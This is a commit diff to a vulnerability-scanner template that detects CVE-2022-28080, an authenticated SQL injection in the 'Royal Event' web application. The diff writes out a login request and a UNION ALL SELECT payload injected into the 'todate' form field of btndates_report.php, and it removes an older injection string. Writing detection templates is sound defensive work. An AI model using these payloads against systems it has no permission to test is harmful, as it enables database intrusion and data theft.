Update CVE-2022-28080.yaml

2022-06-22 11:33:57 +05:30 · 2022-06-22 11:33:57 +05:30 · caf26c0f50
parent 8550551e12
commit caf26c0f50
1 changed files with 34 additions and 56 deletions
--- a/cves/2022/CVE-2022-28080.yaml
+++ b/cves/2022/CVE-2022-28080.yaml
@ -2,90 +2,68 @@ id: CVE-2022-28080

 info:
  name: Royal Event - SQL Injection
-  author: lucasljm2001,ekrause
+  author: lucasljm2001,ekrause,ritikchaddha
  severity: high
  description: |
    Detects an SQL Injection vulnerability in Royal Event System
  reference:
+    - https://www.exploit-db.com/exploits/50934
    - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28080
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-28080
-  tags: cve,cve2022,sqli,authenticated
+  tags: cve,cve2022,sqli,authenticated,cms,royalevent

 requests:
-    - raw:
-
+  - raw:
      - |
        POST /royal_event/ HTTP/1.1
-          Host: {{Host}}
-          Content-Length: 353
-          Cache-Control: max-age=0
-          sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
-          sec-ch-ua-mobile: ?0
-          sec-ch-ua-platform: "Windows"
-          Upgrade-Insecure-Requests: 1
-          Origin: {{Scheme}}://{{Host}}
-          Content-Type: multipart/form-data; boundary=----WebKitFormBoundary841M7QIgh7rqLsVh
-          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
-          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-          Sec-Fetch-Site: same-origin
-          Sec-Fetch-Mode: navigate
-          Sec-Fetch-User: ?1
-          Sec-Fetch-Dest: document
-          Referer: {{Scheme}}://{{Host}}/royal_event/
-          Accept-Encoding: gzip, deflate
-          Accept-Language: es-ES,es;q=0.9
-          Connection: close
+        Host: {{Hostname}}
+        Content-Length: 353
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD

-          ------WebKitFormBoundary841M7QIgh7rqLsVh
-          Content-Disposition: form-data; name="username"
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD
+        Content-Disposition: form-data; name="username"

-          {{username}}
-          ------WebKitFormBoundary841M7QIgh7rqLsVh
-          Content-Disposition: form-data; name="password"
+        {{username}}
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD
+        Content-Disposition: form-data; name="password"

-          {{password}}
-          ------WebKitFormBoundary841M7QIgh7rqLsVh
-          Content-Disposition: form-data; name="login"
+        {{password}}
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD
+        Content-Disposition: form-data; name="login"


-          ------WebKitFormBoundary841M7QIgh7rqLsVh--
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD--
+
      - |
-        POST /royal_event/btndates_report.php#?= HTTP/1.1
-        Host: {{Host}}
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
-        Accept-Encoding: gzip, deflate
-        Accept-Language: en-us,en;q=0.5
-        Cache-Control: no-cache
-        Content-Length: 334
-        Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
-        Referer: {{Scheme}}://{{Host}}/royal_event/btndates_report.php#?=
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
+        POST /royal_event/btndates_report.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD

-        --f289a6438bcc45179bcd3eb7ddc555d0
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
        Content-Disposition: form-data; name="todate"

-        -'select SomeRandomText from tbladmin--
-        --f289a6438bcc45179bcd3eb7ddc555d0
+        1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- -
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
        Content-Disposition: form-data; name="search"

        3
-        --f289a6438bcc45179bcd3eb7ddc555d0
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
        Content-Disposition: form-data; name="fromdate"

        01/01/2011
-        --f289a6438bcc45179bcd3eb7ddc555d0--
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD--

-      cookie-reuse: true
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '{{md5("{{randstr}}")}}'

-      matchers:
-        - type: word
-          words:
-            - "SomeRandomText"
-
-        - type: status
-          status:
-            - 200
+      - type: status
+        status:
+          - 200